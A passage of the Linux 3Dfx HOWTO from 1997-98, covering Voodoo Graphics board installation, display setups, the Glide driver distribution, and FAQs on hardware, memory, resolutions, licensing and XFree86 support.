many World-Wide-Web sites, including Most Linux
CD-ROM distributions include the HOWTOs, often under the
/usr/doc/directory, and you can also buy printed copies from several

If you make a translation of this document into another language, let
me know and I'll include a reference to it here.

1.5. Feedback

I rely on you, the reader, to make this HOWTO useful. If you have any
suggestions, corrections, or comments, please send them to me (, and I will try to incorporate them in the next
revision. Please add HOWTO 3Dfx to the Subject-line of the mail, so
procmail will dump it in the appropriate folder.

Before sending bug reports or questions, please read all of the
information in this HOWTO, and send detailed information about the

If you publish this document on a CD-ROM or in hardcopy form, a
complimentary copy would be appreciated. Mail me for my postal
address. Also consider making a donation to the Linux Documentation
Project to help support free documentation for Linux. Contact the
Linux HOWTO coordinator, Tim Bynum (, for
more information.

1.6. Distribution Policy

Copyright (c) 1997, 1998 by Bernd Kreimeier. This document may be
distributed under the terms set forth in the LDP license at

This HOWTO is free documentation; you can redistribute it and/or
modify it under the terms of the LDP license. This document is
distributed in the hope that it will be useful, but without any
warranty; without even the implied warranty of merchantability or
fitness for a particular purpose. See the LDP license for more

2. Graphics Accelerator Technology

2.1. Basics

This section gives a very cursory overview of computer graphics
accelerator technology, in order to help you understand the concepts
used later in the document. You should consult e.g. a book on OpenGL
in order to learn more.

2.2. Hardware configuration

Graphics accelerators come in different flavors: either as a separate
PCI board that is able to pass through the video signal of a (possibly
2D or video accelerated) VGA board, or as a PCI board that does both
VGA and 3D graphics (effectively replacing older VGA controllers).
The 3Dfx boards based on the Voodoo Graphics (tm) belong to the former
category. We will get into this again later.

If there is no address conflict, any 3D accelerator board could be
present under Linux without interfering, but in order to access the
accelerator, you will need a driver. A combined 2D/3D accelerator
might behave differently.

2.3. A bit of Voodoo Graphics (tm) architecture

Usually, accessing texture memory and frame/depth buffer is a major
bottleneck. For each pixel on the screen, there are at least one
(nearest), four (bi-linear), or eight (tri-linear mipmapped) read
accesses to texture memory, plus a read/write to the depth buffer, and
a read/write to frame buffer memory.

The Voodoo Graphics (tm) architecture separates texture memory from
frame/depth buffer memory by introducing two separate rendering
stages, with two corresponding units (Pixelfx and Texelfx), each
having a separate memory interface to dedicated memory. This gives an
above-average fill rate, paid for restrictions in memory management
(e.g. unused framebuffer memory can not be used for texture caching).

Moreover, a Voodoo Graphics (tm) could use two TMU's (texture
management or texelfx units), and finally, two Voodoo Graphics (tm)
could be combined with a mechanism called Scan-Line Interleaving
(SLI). SLI essentially means that each Pixelfx unit effectively
provides only every other scanline, which decreases bandwidth impact
on each Pixelfx' framebuffer memory.

3. Installation

Configuring Linux to support 3Dfx accelerators involves the following

1. Installing the board.

2. Installing the Glide distribution.

3. Compiling, linking and/or running the application.

The next sections will cover each of these steps in detail.

3.1. Installing the board

Follow the manufacturer's instructions for installing the hardware or
have your dealer perform the installation. It should not be necessary
to select settings for IRQ, DMA channel, either Plug&Pray (tm) or
factory defaults should work. The add-on boards described here are
memory mapped devices and do not use IRQ's. The only kind of conflict
to avoid is memory overlap with other devices.

As 3Dfx does not develop or sell any boards, do not contact them on
any problems.

3.1.1. Troubleshooting the hardware installation

To check the installation and the memory mapping, do cat /proc/pci.
The output should contain something like

Bus 0, device 12, function 0:
VGA compatible controller: S3 Inc. Vision 968 (rev 0).
Medium devsel. IRQ 11.
Non-prefetchable 32 bit memory at 0xf4000000.

Bus 0, device 9, function 0:
Multimedia video controller: Unknown vendor Unknown device (rev 2).
Vendor id=121a. Device id=1.
Fast devsel. Fast back-to-back capable.
Prefetchable 32 bit memory at 0xfb000000.

for a Diamond Monster 3D used with a Diamond Stealth-64. Additionally
a cat /proc/cpuinfo /proc/meminfo might be helpfull for tracking down
conflicts and/or submitting a bug report.

With current kernels, you will probably get a boot warning like

Jun 12 12:31:52 hal kernel: Warning : Unknown PCI device (121a:1).
Please read include/linux/pci.h

which could be safely ignored. If you happen to have a board not very
common, or have encountered a new revision, you should take the time
to follow the advice in /usr/include/linux/pci.h and send all neces-
sary information to

If you experience any problems with the board, you should try to
verify that DOS and/or Win95 or NT support works. You will probably
not receive any useful response from a board manufacturer on a bug
report or request regarding Linux. Having dealt with the Diamond
support e-mail system, I would not expect useful responses for other
operating systems either.

3.1.2. Configuring the kernel

There is no kernel configuration necessary, as long as PCI support is
enabled. The Linux Kernel HOWTO
should be
consulted for the details of building a kernel.

3.1.3. Configuring devices

The current drivers do not (yet) require any special devices. This is
different from other driver developments (e.g. the sound drivers,
where you will find a /dev/dsp and /dev/audio). The driver uses the
/dev/mem device which should always be available. In consequence, you
need to use setuid or root privileges to access the accelerator board.

3.2. Setting up the Displays

There are two possible setups with add-on boards. You could either
pass-through the video signal from your regular VGA board via the
accelerator board to the display, or you could use two displays at the
same time. Rely to the manual provided by the board manufacturer for
details. Both configurations have been tried with the Monster 3D

3.2.1. Single screen display solution

This configuration allows you to check basic operations of the
accelerator board - if the video signal is not transmitted to the
display, hardware failure is possible.

Beware that the video output signal might deteoriate significantly if
passed through the video board. To a degree, this is inevitable.
However, reviews have complained about below-average of the cables
provided e.g. with the Monster 3D, and judging from the one I tested,
this has not changed.

There are other pitfalls in single screen configurations. Switching
from the VGA display mode to the accelerated display mode will change
resolution and refresh rate as well, even if you are using 640x480
e.g. with X11, too. Moreover, if you are running X11, your
application is responsible for demanding all keyboard and mouse
events, or you might get stuck because of changed scope and exposure
on the X11 display (that is effectively invisible when the accelerated
mode is used) You could use SVGA console mode instead of X11.

If you are going to use a single screen configuration and switch modes
often, remember that your monitor hardware might not enjoy this kind
of use.

3.2.2. Single screen dual cable setup

Some high end monitors (e.g. the EIZO F-784-T) come with two
connectors, one with 5 BNC connectors for RGB, HSync, VSync, the other
e.g. a regular VGA or a 13W3 Sub-D VGA. These displays usually also
feature a front panel input selector to safely switch from one to the
other. It is thus possible to use e.g. a VGA-to-BNC cable with your
high end 2D card, and a VGA-to-13W3 Sub-D cable with your 3Dfx, and
effectively run dual screen on one display.

3.2.3. Dual screen display solution

The accelerator board does not need the VGA input signal. Instead of
routing the common video output through the accelerator board, you
could attach a second monitor to its output, and use both at the same
time. This solution is more expensive, but gives best results, as your
main display will still be hires and without the signal quality losses
involved in a pass-through solution. In addition, you could use X11
and the accelerated full screen display in parallel, for development
and debugging.

A common problem is that the accelerator board will not provide any
video signal when not used. In consequence, each time the graphics
application terminates, the hardware screensave/powersave might kick
in depending on your monitors configuration. Again, your hardware
might not enjoy being treated like this. You should use


to force continued video output in this setup.

3.3. Installing the Glide distribution

The Glide driver and library are provided as a single compressed
archive. Use tar and gzip to unpack, and follow the instructions in
the README and INSTALL accompanying the distribution. Read the
install script and run it. Installation puts everything in
/usr/local/glide/include,lib,bin and sets the ld.conf to look there.
Where it installs and setting ld.conf are independent actions. If you
skip the ld.conf step then you need the LD_LIBRARY_PATH.

You will need to install the header files in a location available at
compile time, if you want to compile your own graphics applications.
If you do not want to use the installation as above (i.e. you insist
on a different location), make sure that any application could access
the shared libary at runtime, or you will get a response like can't
load library ''.

3.3.1. Using the detect program

There is a bin/detect program in the distribution (the source is not
available). You have to run it as root, and you will get something

slot vendorId devId baseAddr0 command description
---- -------- ------ ---------- ------- -----------
00 0x8086 0x122d 0x00000000 0x0006 Intel:430FX (Triton)
07 0x8086 0x122e 0x00000000 0x0007 Intel:ISA bridge
09 0x121a 0x0001 0xfb000008 0x0002 3Dfx:video multimedia adapter
10 0x1000 0x0001 0x0000e401 0x0007 ???:SCSI bus controller
11 0x9004 0x8178 0x0000e001 0x0017 Adaptec:SCSI bus controller
12 0x5333 0x88f0 0xf4000000 0x0083 S3:VGA-compatible display co

as a result. If you do not have root privileges, the program will bail
out with

Permission denied: Failed to change I/O privilege. Are you root?

output might come handy for a bug report as well.

3.3.2. Using the test programs

Within the Glide distribution, you will find a folder with test
programs. Note that these test programs are under 3Dfx copyright, and
are legally available for use only if you have purchased a board with
a 3Dfx chipset. See the LICENSE file in the distribution, or their web
site for details.

It is recommend to compile and link the test programs even if there
happen to be binaries in the distribution. Note that some of the
programs will requires some files like alpha.3df from the distribution
to be available in the same folder. All test programs use the 640x480
screen resolution. Some will request a veriety of single character
inputs, others will just state Press A Key To Begin Test. Beware of
loss of input scope if running X11 on the same screen at the same

See the README.test for a list of programs, and other details.

4. Answers To Frequently Asked Questions

The following section answers some of the questions that (will) have
been asked on the Usenet news groups and mailing lists. The FAQ has
been subdivided into several parts for convenience, namely

o FAQ: Requirements?

o FAQ: Voodoo Graphics (tm)? 3Dfx?

o FAQ: Glide?

o FAQ: Glide and SVGA?

o FAQ: Glide and XFree86?

o FAQ: Glide versus OpenGL/Mesa?

o FAQ: But Quake?

o FAQ: Troubleshooting?

Each section lists several questions and answers, which will
hopefully address most problems.

5. FAQ: Requirements?

5.1. What are the system requirements?

A Linux PC, PCI 2.1 compliant, a monitor capable of 640x480, and a 3D
accelerator board based on the 3Dfx Voodoo Graphics (tm). It will work
on a P5 or P6, with or without MMX. The current version does not use
MMX, but it has some optimized code paths for P6.

At one point, some 3Dfx statements seemed to imply that using Linux
Glide required using a RedHat distribution. Note that while Linux
Glide has originally been ported in a RedHat 4.1 environment, it has
been used and tested with many other Linux distributions, including
homebrew, Slackware, and Debian 1.3.1.

5.2. Does it work with Linux-Alpha?

There is currently no Linux Glide distribution available for any
platform besides i586. As the Glide sources are not available for
distribution, you will have to wait for the binary. Quantum3D has DEC
Alpha support announced for 2H97. Please contact Daryll Strauss if you
are interested in supporting this.

There is also the issue of porting the the assembly modules. While
there are alternative C paths in the code, the assembly module in
Glide (essentially triangle setup) offered significant performance
gains depending on the P5 CPU used.

5.3. Which 3Dfx chipsets are supported?

Currently, the 3Dfx Voodoo Graphics (tm) chipset is supported under
Linux. The Voodoo Rush (tm) chipset is not yet supported.

5.4. Is the Voodoo Rush (tm) supported?

The current port of Glide to Linux does not support the Voodoo Rush
(tm). An update is in the works.

The problem is that at one point the Voodoo Rush (tm) driver code in
Glide depended on Direct Draw. There was an SST96 based DOS portion in
the library that could theoretically be used for Linux, as soon as all
portions residing in the 2D/Direct Draw/D3D combo driver are replaced.

Thus Voodoo Rush (tm) based boards like the Hercules Stingray 128/3D
or Intergraph Intense Rush are not supported yet.

5.5. Which boards are supported?

There are no officially supported boards, as 3Dfx does not sell any
boards. This section does not attempt to list all boards, it will just
give an overview, and will list only boards that have been found to
cause trouble.

It is important to recognize that Linux support for a given board does
not only require a driver for the 3D accelerator component. If a board
features its own VGA core as well, support by either Linux SVGA or
XFree86 is required as well (see section about Voodoo Rush (tm)
chipset). Currently, an add-on solution is recommended, as it allows
you to choose a regular graphics board well supported for Linux. There
are other aspects discussed below.

All Quantum3D Obsidian boards, independend of texture memory, frame
buffer memory, number of Pixelfx and Texelfx units, and SLI should
work. Same for all other Voodoo Graphics (tm) based boards, like
Orchid Righteous 3D, Canopus Pure 3D, Flash 3D, and Diamond Monster
3D. Voodoo Rush (tm) based boards are not yet supported.

Boards that are not based on 3Dfx chipsets (e.g. manufactured by S3,
Matrox, 3Dlabs, Videologic) do not work with the 3Dfx drivers and are
beyond the scope of this document.

5.6. How do boards differ?

As the board manufacturers are using the same chipset, any differences
are due to board design. Examples are quality of the pass-through
cable and connectors (reportedly, Orchid provided better quality than
Diamond), availability of a TV-compliant video signal output (Canopus
Pure 3D), and, most notably, memory size on board.

Most common were boards for games with 2MB texture cache and 2 MB
framebuffer memory, however, the Canopus Pure3D comes with a maximal 4
MB texture cache, which is an advantage e.g. with games using
dynamically changed textures, and/or illumation textures (Quake, most
notably). The memory architecture of a typical Voodoo Graphics (tm)
board is described below, in a separate section.

Quantum 3D offers the widest selection of 3Dfx-based boards, and is
probably the place to go if you are looking for a high end Voodoo
Graphics (tm) based board configuration. Quantum 3D is addressing the
visual simulation market, while most of the other vendors are only
targetting the consumer-level PC-game market.

5.7. What about AGP?

There is no Voodoo Graphics (tm) or Voodoo Rush (tm) AGP board that I
am aware of. I am not aware of AGP support under Linux, and I do not
know whether upcmong AGP boards using 3Dfx technology might possibly
be supported with Linux.

6. FAQ: Voodoo Graphics (tm)? 3Dfx?

6.1. Who is 3Dfx?

3Dfx is a San Jose based manufacturer of 3D graphics accelerator
hardware for arcade games, game consoles, and PC boards. Their
official website is 3Dfx does not sell any boards, but
other companies do, e.g. Quantum3D.

6.2. Who is Quantum3D?

Quantum3D started as a 3Dfx spin-off, manufacturing high end
accelerator boards based on 3Dfx chip technology for consumer and
business market, and supplying arcade game technology. See their home
page at for additional information. For general
inquiries regarding Quantum3D, please send mail to info@quantum3d.

6.3. What is the Voodoo Graphics (tm)?

The Voodoo Graphics (tm) is a chipset manufactured by 3Dfx. It is used
in hardware acceleration boards for the PC. See the HOWTO section on
supported hardware.

6.4. What is the Voodoo Rush (tm)?

The Voodoo Rush (tm) is a derivate of the Voodoo Graphics (tm) that
has an interface to cooperate with a 2D VGA video accelerator,
effectively supporting accelerated graphics in windows. This combo is
currently not supported with Linux.

6.5. What is the Voodoo 2 (tm)?

The Voodoo 2 (tm) is the successor of the Voodoo Graphics (tm)
chipset, featuring several improvements. It is announced for late
March 1998, and annoucements of Voodoo 2 (tm) based boards have been
published e.g. by Quantum 3D, by Creative Labs, Orchid Technologies,
and Diamond Multimedia.

The Voodoo 2 (tm) is supposed to be backwards compatible. However, a
new version of Glide will have to be ported to Linux.

6.6. What is VGA pass-though?

The Voodoo Graphics (tm) (but not the Voodoo Rush (tm)) boards are
add-on boards, meant to be used with a regular 2D VGA video
accelerator board. In short, the video output of your regular VGA
board is used as input for the Voodoo Graphics (tm) based add-on
board, which by default passes it through to the display also
connected to the Voodoo Graphics (tm) board. If the Voodoo Graphics
(tm) is used (e.g. by a game), it will disconnect the VGA input
signal, switch the display to a 640x480 fullscreen mode with the
refresh rate configured by SST variables and the application/driver,
and generate the video signal itself. The VGA doesn't need to be aware
of this, and won't be.

This setup has several advantages: free choice of 2D VGA board, which
is an issue with Linux, as XFree86 drivers aren't available for all
chipsets and revisions, and a cost effective migration path to
accelerated 3D graphics. It also has several disadvantages: an
application using the Voodoo Graphics (tm) might not re-enable video
output when crashing, and regular VGA video signal deteoriates in the
the pass-through process.

6.7. What is Texelfx or TMU?

Voodoo Graphics (tm) chipsets have two units. The first one interfaces
the texture memory on the board, does the texture mapping, and
ultimately generates the input for the second unit that interfaces the
framebuffer. This one is called Texelfx, aka Texture Management Unit,
aka TMU. The neat thing about this is that a board can use two Texelfx
instead of only one, like some of the Quantum3D Obsidian boards did,
effectively doubling the processing power in some cases, depending on
the application.

As each Texelfx can address 4MB texture memory, a dual Texelfx setup
has an effective texture cache of up to 8MB. This can be true even if
only one Texelfx is actually needed by a particular application, as
textures can be distributed to both Texelfx, which are used depending
on the requested texture. Both Texelfx are used together to perform
certain operations as trilinear filtering and illumination
texture/lightmap passes (e.g. in glQuake) in a single pass instead of
the two passes that are required with only one Texelfx. To actually
exploit the theoretically available speedup and cache size increase, a
Glide application has to use both Texelfx properly.

The two Texelfx can not be used separately to each draw a textured
triangle at the same time. A triangle is always drawn using whatever
the current setup is, which can be to use both Texelfx for a single
pass operation combining two textures, or one Texelfx for only a
single texture. Each Texelfx can only access its own memory.

6.8. What is a Pixelfx unit?

Voodoo Graphics (tm) chipsets have two units. The second one
interfaces the framebuffer and ultimately generates the depth buffer
and pixel color updates. This one is called Pixelfx. The neat thing
here is that two Pixelfx units can cooperate in SLI mode, like with
some of the Quantum3D Obsidian boards, effectively doubling the frame

6.9. What is SLI mode?

SLI means "Scanline Interleave". In this mode, two Pixelfx are
connected and render in alternate turns, one handling odd, the other
handling even scanlines of the actual output. Inthis mode, each
Pixelfx stores only half of the image and half of the depth buffer
data in its own local framebuffer, effectively doubling the number of

The Pixelfx in question can be on the same board, or on two boards
properly connected. Some Quantum3D Obsidian boards support SLI with
Voodoo Graphics (tm).

As two cards can decode the same PCI addresses and receive the same
data, there is not necessarily additional bus bandwidth required by
SLI. On the other hand, texture data will have to be replicated on
both boards, thus the amount of texture memory effectively stays the

6.10. Is there a single board SLI setup?

There are now two types of Quantum3D SLI boards. The intial setup
used two boards, two PCI slots, and an interconnect (e.g. the Obsidian
100-4440). The later revision which performs identically is contained
on one full-length PCI board (e.g. Obsidian 100-4440SB). Thus a
single board SLI solution is possible, and has been done.

6.11. How much memory? How many buffers?

The most essential difference between different boards using the
Voodoo Graphics (tm) chipset is the amount and organization of memory.
Quantum3D used a three digit scheme to descibe boards. Here is a
slightly modifed one (anticipating Voodoo 2 (tm)). Note that if you
use more than one Texelfx, they need the same amount of texture cache
memory each, and if you combine two Pixelfx, each needs the same
amount of frame buffer memory.
"SLI / Pixelfx / Texelfx1 / Texelfx2 "

It means that a common 2MB+2MB board would be a 1/2/2/0 solution, with
the minimally required total 4Mb of memory. A Canopus Pure 3D would be
1/2/4/0, or 6MB. An Obsidian-2220 board with two Texelfx would be
1/2/2/2, and an Obsidian SLI-2440 board would be 2/2/4/4. A fully
featured dual board solution (2 Pixelfx, each with 2 Texelfx and 4MB
frame buffer, each Texelfx 4 MB texture cache) would be 2/4/4/4, and
the total amount of memory would be SLI*(Pixelfx+Texelfx1+Texelfx2),
or 24 MB.

So there.

6.12. Does the Voodoo Graphics (tm) do 24 or 32 bit color?

No. The Voodoo Graphics (tm) architecture uses 16bpp internally. This
is true for Voodoo Graphics (tm), Voodoo Rush (tm) and Voodoo 2 (tm)
alike. Quantum3D claims to implement 22-bpp effective color depth with
an enhanced 16-bpp frame buffer, though.

6.13. Does the Voodoo Graphics (tm) store 24 or 32 bit z-buffer per

No. The Voodoo Graphics (tm) architecture uses 16bpp internally for
the depth buffer, too. This again is true for Voodoo Graphics (tm),
Voodoo Rush (tm) and Voodoo 2 (tm) alike. Again, Quantum3D claims that
using the floating point 16-bits per pixel (bpp) depth buffering
provides 22-bpp effective Z-buffer precision.

6.14. What resolutions does the Voodoo Graphics (tm) support?

The Voodoo Graphics (tm) chipset supports up to 4 MB frame buffer
memory. Presuming double buffering and a depth buffer, a 2MB
framebuffer will support a resolution of 640x480. With 4 MB frame
buffer, 800x600 is possible.

Unfortunately 960x720 is not supported. The Voodoo Graphics (tm)
chipset requires that the amount of memory for a particular resolution
must be such that the vertical and horizontal resolutions must be
evenly divisible by 32. The video refresh controller, though can
output any particular resolution, but the "virtual" size required for
the memory footprint must be in dimensions evenly divisible by 32.
So, 960x720 actually requires 960x736 amount of memory, and
960x736x2x3 = 4.04MBytes.

However, using two boards with SLI, or a dual Pixelfx SLI board means
that each framebuffer will only have to store half of the image. Thus
2 times 4 MB in SLI mode are good up to 1024x768, which is the maximum
because of the overall hardware design. You will be able to do
1024x768 tripled buffered with Z, but you will not be able to do e.g.
1280x960 with double buffering.

Note that triple buffering (no VSync synchonization required by the
application), stereo buffering (for interfacing LCD shutters) and
other more demanding setups will severely decrease the available

6.15. What texture sizes are supported?

The maximum texture size for the Voodoo Graphics (tm) chipset is
256x256, and you have to use powers of two. Note that for really small
textures (e.g. 16x16) you are better off merging them into a large
texture, and adjusting your effective texture coordinates

6.16. Does the Voodoo Graphics (tm) support paletted textures?

The Voodoo Graphics (tm) hardware and Glide support the palette
extension to OpenGL. The most recent version of Mesa does support the
GL_EXT_paletted_texture and GL_EXT_shared_texture_palette extensions.

6.17. What about overclocking?

If you want to put aside considerations about warranty and
overheating, and want to do overclocking to boost up performance even
further, there is related info out on the web. The basic mechanism is
to use Glide environment variables to adjust the clock.

Note that the actual recommended clock is board dependend. While the
default clock speed is 50 Mhz, the Diamond Monster 3D property sheet
lets you set up a clock of 57 MHz. It all comes down to the design of
a specific board, and which components are used with the Voodoo
Graphics (tm) chipset - most notably access speed of the RAM in
question. If you exceed the limits of your hardware, rendering
artifacts will occur to say the least. Reportedly, 57 MHz usually
works, while 60 MHz or more is already pushing it.

Increasing the clock frequency also means increasing the waste heat
disposed in the chips, in a nonlinear dependency (10% increase in
frequency means a lot larger increase in heating). In consequence, for
permanent overclocking you might want to educate yourself about ways
to add cooling fans to the board in a way that does not affect
warranty. A very recommendable source is the "3Dfx Voodoo Heat Report"
by Eric van Ballegoie, available on the web.

6.18. Where could I get additional info on Voodoo Graphics (tm)?

There is a FAQ by 3Dfx, which should be available at their web site.
You will find retail information at the following locations: and

Inofficial sites that have good info are "Voodoo Extreme" at, and "Operation 3Dfx" at

7. FAQ: Glide? TexUS?

7.1. What is Glide anyway?

Glide is a proprietary API plus drivers to access 3D graphics
accelerator hardware based on chipsets manufactured by 3Dfx. Glide has
been developed and implemented for DOS, Windows, and Macintosh, and
has been ported to Linux by Daryll Strauss.

7.2. What is TexUS?

In the distribution is a, which is the 3Dfx Interactive
Texture Utility Software. It is an image processing libary and
utility program for preparing images for use with the 3Dfx Interactive
Glide library. Features of TexUS include file format conversion,
MIPmap creation, and support for 3Dfx Interactive Narrow Channel
Compression textures.

The TexUS utility program texus reads images in several popular
formats (TGA, PPM, RGT), generates MIPmaps, and writes the images as
3Dfx Interactive textures files (see e.g. alpha.3df, as found in the
distribution) or as an image file for inspection. For details on the
parameters for texus, and the API, see the TexUS documentation.

7.3. Is Glide freeware?

Nope. Glide is neither GPL'ed nor subject to any other public license.
See LICENSE in the distribution for any details. Effectively, by
downloading and using it, you agree to the End User License Agreement
(EULA) on the 3Dfx web site. Glide is provided as binary only, and you
should neither use nor distribute any files but the ones released to
the public, if you have not signed an NDA. The Glide distribution
including the test program sources are copyrighted by 3Dfx.

The same is true for all the sources in the Glide distribution. In the
words of 3Dfx: These are not public domain, but they can be freely
distributed to owners of 3Dfx products only. No card, No code!

7.4. Where do I get Glide?

The entire 3Dfx SDK is available for download off their public web-
site located at Anything
else 3Dfx publicly released by 3Dfx is nearby on their website, too.

There is also an FTP site, The FTP has a longer timeout,
and some of the larger files have been broken into 3 files (approx.
3MB each).

7.5. Is the Glide source available?

Nope. The Glide source is made available only based on a special
agreement and NDA with 3Dfx.

7.6. Is Linux Glide supported?

Currently, Linux Glide is unsupported. Basically, it is provided under
the same disclaimers as the 3Dfx GL DLL (see below).

However, 3Dfx definitely wants to provide as much support as possible,
and is in the process of setting up some prerequisites. For the time
being, you will have to rely on the 3Dfx newsgroup (see below).

In addition, the Quantum3D web page claims that Linux support (for
Obsidian) is planned for both Intel and AXP architecture systems in

7.7. Where could I post Glide questions?

There are newsgroups currently available only on the NNTP server run by 3Dfx. This USENET groups are dedicated to 3Dfx
and Glide in general, and will mainly provide assistance for DOS,
Win95, and NT. The current list includes:


and the 3dfx.oem.products.* group for specific boards, eg.
3dfx.oem.products.quantum3d.obsidian. Please use for all Lnux Glide related questions.

A mailing list dedicated to Linux Glide is in preparation for 1Q98.
Send mail to, no subject, body of the message
info linux-3dfx to get information about the posting guidelines, the
hypermail archive and how to subscribe to the list or the digest.

7.8. Where to send bug reports?

Currently, you should rely on the newsgroup (see above), that is There is no official support e-mail
set up yet. For questions not specific to Linux Glide, make sure to
use the other newsgroups.

7.9. Who is maintaining it?

3Dfx will appoint an official maintainer soon. Currently, inofficial
maintainer of the Linux Glide port is Daryll Strauss. Please post bug
reports in the newsgroup (above). If you are confident that you found
a bug not previously reported, please mail to Daryll at

7.10. How can I contribute to Linux Glide?

You could submit precise bug reports. Providing sample programs to be
included in the distribution is another possibility. A major
contribution would be adding code to the Glide based Mesa Voodoo
driver source. See section on Mesa Voodoo below.

7.11. Do I have to use Glide?

Yes. As of now, there is no other Voodoo Graphics (tm) driver
available for Linux. At the lowest level, Glide is the only interface
that talks directly to the hardware. However, you can write OpenGL
code without knowing anything about Glide, and use Mesa with the Glide
based Mesa Voodoo driver. It helps to be aware of the involvement of
Glide for recognizing driver limitations and bugs, though.

7.12. Should I program using the Glide API?

That depends on the application you are heading for. Glide is a
proprietary API that is partly similar to OpenGL or Mesa, partly
contains features only available as EXTensions to some OpenGL
implementations, and partly contains features not available anywhere
but within Glide.

If you want to use the OpenGL API, you will need Mesa (see below).
Mesa, namely the Mesa Voodoo driver, offers an API resembling the well
documented and widely used OpenGL API. However, the Mesa Voodoo driver
is in early alpha, and you will have to accept performance losses and
lack of support for some features.

In summary, the decision is up to you - if you are heading for maximum
performance while accepting potential problems with porting to
non-3Dfx hardware, Glide is not a bad choice. If you care about
maintenance, OpenGL might be the best bet in the long run.

7.13. What is the Glide current version?

The current version of Linux Glide is 2.4. The next version will
probably be identical to the current version for DOS/Windows, which is
2.4.3, which comes in two distributions. Right now, various parts of
Glide are different for Voodoo Rush (tm) (VR) and Voodoo Graphics (tm)
(VG) boards. Thus you have to pick up separate distributions (under
Windows) for VR and VG. The same will be true for Linux. There will
possibly be another chunk of code and another distribution for Voodoo
2 (tm) (V2) boards.

There is also a Glide 3.0 in preparation that will extend the API for
use of triangle fans and triangle strips, and provide better state
change optimization. Support for fans and strips will in some
situations significantly reduce the amount of data sent ber triangle,
and the Mesa driver will benefit from this, as the OpenGL API has
separate modes for this. For a detailed explanation on this see e.g.
the OpenGL documentation.

7.14. Does it support multiple Texelfx already?

Multiple Texelfx/TMU's can be used for single pass trilinear
mipmapping for improvement image quality without performance penalty
in current Linux Glide already. You will need a board with two Texelfx
(that is, one of the appropriate Quantum3D Obsidian boards). The
application needs to specify the use of both Texelfx accordingly, it
does not happen automatically.

Note that because most applications are implemented for consumer
boards with a single Texelfx, they might not query the presence of a
second Texelfx, and thus not use it. This is not a flaw of Glide but
of the application.

7.15. Is Linux Glide identical to DOS/Windows Glide?

The publicly available version of Linux Glide should be identical to
the respective DOS/Windows versions. Delays in releasing the Linux
port of newer DOS/Windows releases are possible.

7.16. Where to I get information on Glide?

There is exhaustive information available from 3Dfx. You could
download it from their home page at These are for free,
presuming you bought a 3Dfx hardware based board. Please read the
licensing regulations.

Basically, you should look for some of the following:

o Glide Release Notes

o Glide Programming Guide

o Glide Reference Manual

o Glide Porting Guide

o TexUs Texture Utility Software

o ATB Release Notes

o Installing and Using the Obsidian

These are available as Microsoft Word documents, and part of the
Windows Glide distribution, i.e. the self-extracting archive file.
Postscript copies for separate download should be available at as well. Note that the release numbers are not always
in sync with those of Glide.

7.17. Where to get some Glide demos?

You will find demo sources for Glide within the distribution (test
programs), and on the 3Dfx home page. The problem with the latter is
that some require ATB. To port these demos to Linux, the event
handling has to be completely rewritten.

In addition, you might find useful some of the OpenGL demo sources
accompanying Mesa and GLUT. While the Glide API is different from the
OpenGL API, they target the same hardware rendering pipeline.

7.18. What is ATB?

Some of the 3Dfx demo programs for Glide depend not only on Glide but
also on 3Dfx's proprietary Arcade Toolbox (ATB), which is available
for DOS and Win32, but has not been ported for Linux. If you are a
devleoper, the sources are available within the Total Immersion
program, so porting ATB to Linux would be possible.

8. FAQ: Glide and XFree86?

8.1. Does it run with XFree86?

Basically, the Voodoo Graphics (tm) hardware does not care about X.
The X server will not even notice that the video signal generated by
the VGA hardware does not reach the display in single screen
configurations. If your application is not written X aware, Glide
switching to full screen mode might cause problems (see
troubleshooting section). If you do not want the overhead of writing
an X11-aware application, you might want to use SVGA console mode

So yes, it does run with XFree86, but no, it is not cooperating if you
don't write your application accordingly. You can use the Mesa "window
hack", which will be significantly slower than fullscreen, but still a
lot faster than software rendering (see section below).

8.2. Does it only run full screen?

See above. The Voodoo Graphics (tm) hardware is not window environment
aware, neither is Linux Glide. Again, the experimental Mesa "window
hack" covered below will allow for pasting the Voodoo Graphics (tm)
board framebuffer's content into an X11 window.

8.3. What is the problem with AT3D/Voodoo Rush (tm) boards?

There is an inherent problem when using Voodoo Rush (tm) boards with
Linux: Basically, these boards are meant to be VGA 2D/3D accelerator
boards, either as a single board solution, or with a Voodoo Rush (tm)
based daughterboard used transparently. The VGA component tied to the
Voodoo Rush (tm) is a Alliance Semiconductor's ProMotion-AT3D
multimedia accelerator. To use this e.g. with XFree86 at all, you
need a driver for the AT3D chipset.

There is a mailing list on this, and a web site with FAQ at Look there for most current
info. There is a SuSE maintained driver at Reportedly, the XFree86
SVGA server also works, supporting 8, 16 and 32 bpp. Official support
will probably be in XFree86 4.0. XFree86 decided to prepare an
intermediate XFree86 3.3.2 release as well, which might already
address the issues.

The following XF86Config settings reportedly work.

# device section settings
Chipset "AT24"
Videoram 4032

# videomodes tested by Oliver Schaertel
# 25.18 28.32 for 640 x 480 (70hz)
# 61.60 for 1024 x 786 (60hz)
# 120 for 1280 x 1024 (66hz)

In summary, there is nothing prohibiting this except for the fact that
the drivers in XFree86 are not yet finished.

If you want a more technical explanation: Voodoo Rush (tm) support
requires X server changes to support grabbing a buffer area in the
video memory on the AT3D board, as the Voodoo Rush (tm) based boards
need to store their back buffer and z buffer there. This memory
allocation and locking requirement is not a 3Dfx specific problem, it
is also needed e.g. for support of TV capture cards, and is thus under
active development for XFree86. This means changes at the device
dependend X level (thus XAA), which are currently implemented as an
extension to XFree86 DGA (Direct Graphics Access, an X11 extension
proposal implemented in different ways by Sun and XFree86, that is not
part of the final X11R6.1 standard and thus not portable). It might be
part of an XFree86 GLX implementation later on. The currently
distributed X servers assume they have full control of the
framebuffer, and use anything that is not used by the visual region of
the framebuffer as pixmap cache, e.g. for caching fonts.

8.4. What about GLX for XFree86?

There are a couple of problems.

The currently supported Voodoo Graphics (tm) hardware and the
available revision of Linux Glide are full screen only, and not set up
to share a framebuffer with a window environment. Thus GLX or other
integration with X11 is not yet possible.

The Voodoo Rush (tm) might be capable of cooperating with XFree86
(that is, an SVGA compliant board will work with the XFree86 SVGA
server), but it is not yet supported by Linux Glide, nor do S3 or
other XFree86 servers support these boards yet.

In addition, GLX is tied to OpenGL or, in the Linux case, to Mesa.
The XFree86 team is currently working on integrating Mesa with their X
Server. GLX is in beta, XFree86 3.3 has the hooks for GLX. See Steve
Parker's GLX pages at for the
most recent information. Moreover, there is a joint effort by XFree86
and SuSe, which includes a GLX, see Currently,
Mesa still uses its GLX emulation with Linux.

8.5. Glide and commerical X Servers?

I have not received any mail regarding use of Glide and/or Mesa with
commercial X Servers. I would be interested to get confirmation on
